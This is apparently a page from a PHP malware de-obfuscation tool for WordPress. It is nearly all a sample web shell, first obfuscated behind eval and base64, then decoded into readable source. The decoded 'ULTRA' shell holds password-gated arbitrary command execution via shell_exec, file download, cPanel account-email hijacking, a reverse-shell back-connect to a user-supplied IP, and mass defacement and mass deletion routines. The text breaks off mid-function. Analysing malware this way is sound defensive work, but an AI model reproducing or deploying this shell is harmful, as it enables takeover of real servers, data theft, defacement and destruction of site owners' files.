De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', hash('sha256',$_POST['pwdyt'])) == 'f5905ab47b8b716f09bce4a6c0d5e5cb3db2ce8da38c3c271f1e69b0a587c76e') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?><?php null; $ULTRA = "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"; @eval(base64_decode(base64_decode("\x57\x6c\x68\x61\x61\x47\x4a\x44\x61\x48\x70\x6b\x53\x45\x70\x6d\x59\x32\x30\x35\x4d\x45\x31\x55\x54\x57\x39\x61\x4d\x33\x42\x77\x59\x6d\x31\x61\x63\x31\x6c\x59\x55\x6d\x78\x4c\x52\x32\x51\x32\x59\x56\x63\x31\x62\x57\x4a\x48\x52\x6a\x42\x61\x55\x32\x68\x75\x5a\x57\x35\x57\x64\x56\x6b\x79\x4f\x58\x52\x6a\x53\x45\x70\x73\x59\x7a\x4e\x4e\x62\x31\x6c\x74\x52\x6e\x70\x61\x56\x46\x6b\x77\x57\x44\x4a\x53\x62\x46\x6b\x79\x4f\x57\x74\x61\x55\x32\x64\x72\x56\x6c\x56\x34\x56\x56\x56\x72\x52\x58\x42\x4c\x55\x32\x74\x77\x53\x31\x4e\x72\x4e\x77\x3d\x3d"))); exit();
<?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', hash('sha256', $_POST['pwdyt'])) == 'f5905ab47b8b716f09bce4a6c0d5e5cb3db2ce8da38c3c271f1e69b0a587c76e') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } null; $ULTRA = ""; @eval { clearstatcache(); header("X-Content-Type-Options: 0"); header("X-XSS-Protection: 0"); header("Content-Type: text/html"); header_remove("x-powered-by"); @ob_start(); @session_start(); @set_time_limit(0); @ini_set("max_execution_time", 0); @error_reporting(0); @ini_set("output_buffering", 0); @ini_set("display_errors", 0); @ini_set("log_errors", 0); @ini_set('error_log', 0); if (isset($_GET['action']) && $_GET['action'] == 'download') { @ob_clean(); $file = $_GET['item']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } header("HTTP/1.1 500 Internal Server Error", 0, 500); http_response_code(500); function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit; } return true; } function clear() { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } return true; } function writable($path, $perms) { return !is_writable($path) ? "<font color=\"red\">" . $perms . "</font>" : "<font color=\"lime\">" . $perms . "</font>"; } function perms($path) { $perms = fileperms($path); if (($perms & 0xc000) == 0xc000) { // Socket $info = 's'; } elseif (($perms & 0xa000) == 0xa000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } $info .= $perms & 0x100 ? 'r' : '-'; $info .= $perms & 0x80 ? 'w' : '-'; $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); $info .= $perms & 0x20 ? 'r' : '-'; $info .= $perms & 0x10 ? 'w' : '-'; $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); $info .= $perms & 0x4 ? 'r' : '-'; $info .= $perms & 0x2 ? 'w' : '-'; $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); return $info; } function fsize($file) { $a = ["B", "KB", "MB", "GB", "TB", "PB"]; $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2) . " " . $a[$pos]; } if (isset($_GET['dir'])) { $path = $_GET['dir']; chdir($_GET['dir']); } else { $path = getcwd(); } $path = str_replace('\\', '/', $path); $exdir = explode('/', $path); function getOwner($item) { if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } // CMD function cmd($command) { global $path; if (strpos($command, 'resetcp') !== false) { $email = explode(' ', $command); if (!$email[1] || !filter_var($email[1], FILTER_VALIDATE_EMAIL)) { return "You must specified valid email address. resetcp youremail@example.com"; } $pathcp = explode("/", $path); $text = "---\n\"email\":'{$email[1]}'"; $file = join('/', [$pathcp[0], $pathcp[1], $pathcp[2]]); $file .= '/.cpanel/'; if (file_exists($file . 'contactinfo')) { unlink($file . 'contactinfo'); } file_put_contents($file . 'reset', $text); if (file_exists($file . 'reset')) { rename($file . 'reset', $file . 'contactinfo'); return "Email for reset cpanel changed to '{$email[1]}'"; } return "Failed to change reset cp email!"; } elseif (function_exists('shell_exec')) { return shell_exec($command . ' 2>&1'); } else { return "Disable Function"; } } // Back Conncect function bctool() { if (isset($_POST['ip']) && isset($_POST['port'])) { echo "<center>"; echo "<p>BackConnect by ULTRA</p>"; echo '<button type="button" class="btn btn-outline-light" onclick="history.go(-2)">Back</button>'; echo "</center>"; $sockfd = fsockopen($_POST['ip'], $_POST['port'], $errno, $errstr); if ($errno != 0) { echo "<center>"; echo "<br><font color='red'>{$errno} : {$errstr}</font>"; echo "</center>"; } else { if (!$sockfd) { $result = "<center><br><p>Unexpected error has occured, connection may have failed.</p></center>"; } else { @fputs($sockfd, " _ _ _ _ _ \n / \\ / \\ / \\ / \\ / \\ Back\n ( U | L | T | R | A ) Connect\n \\_/ \\_/ \\_/ \\_/ \\_/\n\n"); $dir = @shell_exec("pwd"); $sysinfo = @shell_exec("uname -a"); $time = @shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n"); while (!feof($sockfd)) { $cmdPrompt = '[ULTRA]:~$ '; @fputs($sockfd, $cmdPrompt); $command = @fgets($sockfd, $len); @fputs($sockfd, "\n" . @shell_exec($command) . "\n"); } @fclose($sockfd); } } } else { echo '<!-- back connect --> '; echo '<form action="" method="post">'; echo '<div class="mb-3">'; echo '<label class="form-label">Ip</label>'; echo '<input type="text" class="form-control" name="ip" placeholder="127.0.0.0" required>'; echo '</div>'; echo '<div class="mb-3">'; echo '<label class="form-label">Port</label>'; echo '<input type="text" class="form-control" name="port" placeholder="1337" required>'; echo '</div>'; echo '<button class="btn btn-outline-light" type="submit">Submit</button>'; echo '</form>'; } } // Mass Deface function massdeface($path) { function massdef($dir, $file, $content) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . '/' . $file; if ($dirb === '.') { file_put_contents($lokasi, $content); } elseif ($dirb === '..') { file_put_contents($lokasi, $content); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "{$dirb}/{$file}\n"; file_put_contents($lokasi, $content); } } } } } } if (isset($_POST['massDefDir']) && isset($_POST['massDefName']) && isset($_POST['massDefContent'])) { $name = $_POST['massDefName']; echo "<center>------- Result -------</center>"; echo '<div class="card text-dark col-md-7 mb-3 mt-2">'; echo "<pre>Done ~~<br><br>./{$name}<br>"; massdef($_POST['massDefDir'], $name, $_POST['massDefContent']); echo '</pre></div>'; } else { echo '<!-- mass deface --> '; echo '<div class="col-md-5">'; echo '<form action="" method="post">'; echo '<div class="mb-3">'; echo '<label class="form-label">Directory</label>'; echo "<input type='text' class='form-control' name='massDefDir' value='{$path}'>"; echo '</div>'; echo '<div class="mb-3">'; echo '<label class="form-label">File Name</label>'; echo '<input type="text" class="form-control" name="massDefName" placeholder="test.php">'; echo '</div>'; echo '<div class="mb-3">'; echo '<label class="form-label">File Content</label>'; echo '<textarea class="form-control" name="massDefContent" rows="7" placeholder="Hello World"></textarea>'; echo '</div>'; echo '<button class="btn btn-outline-light" type="submit">Submit</button>'; echo '</form>'; echo '</div>'; } } // Mass Delete function massdelete($path) { function massdel($dir, $file) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . '/' . $file; if ($dirb === '.') { if (file_exists("{$dir}/{$file}")) { unlink("{$dir}/{$file}"); } } elseif ($dirb === '..') { if (file_exists('' . dirname($dir) . "/{$file}")) { unlink('' . dirname($dir) . "/{$file}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi} > Deleted\n"; unlink($lokasi); $massdel = massdel($dirc, $file); } } } } } } } if (isset($_POST['massDel']) && isset($_POST['massDelName'])) { $name = $_POST['massDelName']; echo "<center>------- Result -------</center>"; echo '<div class="card text-dark col-md-7 mb-3 mt-2">'; echo "<pre>Done ~~<br><br>./{$name} > Deleted<br>"; massdel($_POST['massDel'], $name); echo '</pre></div>'; } else { echo '<!-- mass delete --> '; echo '<div class="col-md-5">'; 